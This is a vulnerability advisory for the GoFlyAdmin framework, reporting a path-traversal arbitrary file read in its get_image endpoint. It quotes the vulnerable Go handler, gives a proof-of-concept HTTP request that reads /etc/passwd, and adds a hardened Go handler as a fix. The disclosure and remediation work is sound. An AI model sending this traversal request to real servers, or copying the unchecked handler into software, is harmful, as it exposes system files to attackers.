goflyadmin arbitrary file read vulnerability

I came across this framework by chance and dug out a 0day on the spot; I submitted a CVE request, but it was not accepted because there was no specific numeric version number.

BUG_Author:

ifish

Affected version:

goflyadmin open source version

Vendor:

https://github.com/huanglishi/GoFlyAdmin

Software:

https://goflys.cn/prdetail?id=6

Vulnerability File:

/GoFlyAdmin/app/common/uploadfile.go

Vulnerability Description

A vulnerability has been discovered in GoFlyAdmin, specifically within the getimg interface, which fails to validate the input parameters. This flaw allows remote attackers to read arbitrary files from the system.

The vulnerable code is located in /GoFlyAdmin/app/common/uploadfile.go:

func (api *Uploadfile) Get_image(c *gin.Context) {
	imageName := c.Query("url")             // attacker-controlled value
	imgrul := strings.Split(imageName, "?") // only the query string is stripped
	c.File(imgrul[0])                       // served as-is, no directory restriction
}

The Get_image function does not properly validate the url parameter, allowing attackers to supply a crafted URL to read arbitrary files from the server.

Proof of Concept (PoC)

To exploit this vulnerability, an attacker can send a request to the vulnerable endpoint with a crafted URL parameter:

GET http://127.0.0.1:8108/common/uploadfile/get_image?url=../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:8108
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1

This request will cause the server to read and return the contents of the /etc/passwd file.
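The fix is to resolve the requested name inside a fixed upload directory and refuse anything that ends up outside it. The following is an added example written for this advisory, not GoFlyAdmin's own code: it uses the standard net/http package instead of gin so it runs without dependencies (a gin handler would call c.File(full) after the same check), and the "./uploads" directory is an assumed location.

```go
package main

import (
	"errors"
	"net/http"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned when the requested name escapes the upload directory.
var ErrOutsideBase = errors.New("requested path is outside the upload directory")

// ResolveImagePath maps the user-supplied "url" value onto a file under baseDir.
// It drops any query string (as Get_image does), rejects empty, absolute and
// NUL-containing names, cleans ".." segments, and finally verifies that the
// resulting path is still inside baseDir before anything is served.
func ResolveImagePath(baseDir, rawURL string) (string, error) {
	name := strings.SplitN(rawURL, "?", 2)[0]
	if name == "" || filepath.IsAbs(name) || strings.ContainsRune(name, 0) {
		return "", ErrOutsideBase
	}
	base, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	full := filepath.Join(base, filepath.FromSlash(name)) // Join also cleans the path
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == "." || rel == ".." ||
		strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return full, nil
}

// getImageHandler is the hardened counterpart of Get_image.
func getImageHandler(baseDir string) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		full, err := ResolveImagePath(baseDir, r.URL.Query().Get("url"))
		if err != nil {
			http.Error(w, "invalid image path", http.StatusBadRequest)
			return
		}
		http.ServeFile(w, r, full)
	}
}

func main() {
	// "./uploads" is an assumed upload directory, not a path from the project.
	http.Handle("/common/uploadfile/get_image", getImageHandler("./uploads"))
	_ = http.ListenAndServe(":8108", nil)
}
```

With this check in place, the traversal request from the PoC is answered with 400 instead of the contents of /etc/passwd, while legitimate names such as 2024/pic.png?v=1 still resolve to a file under the upload directory.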

Updated: 2024-10-17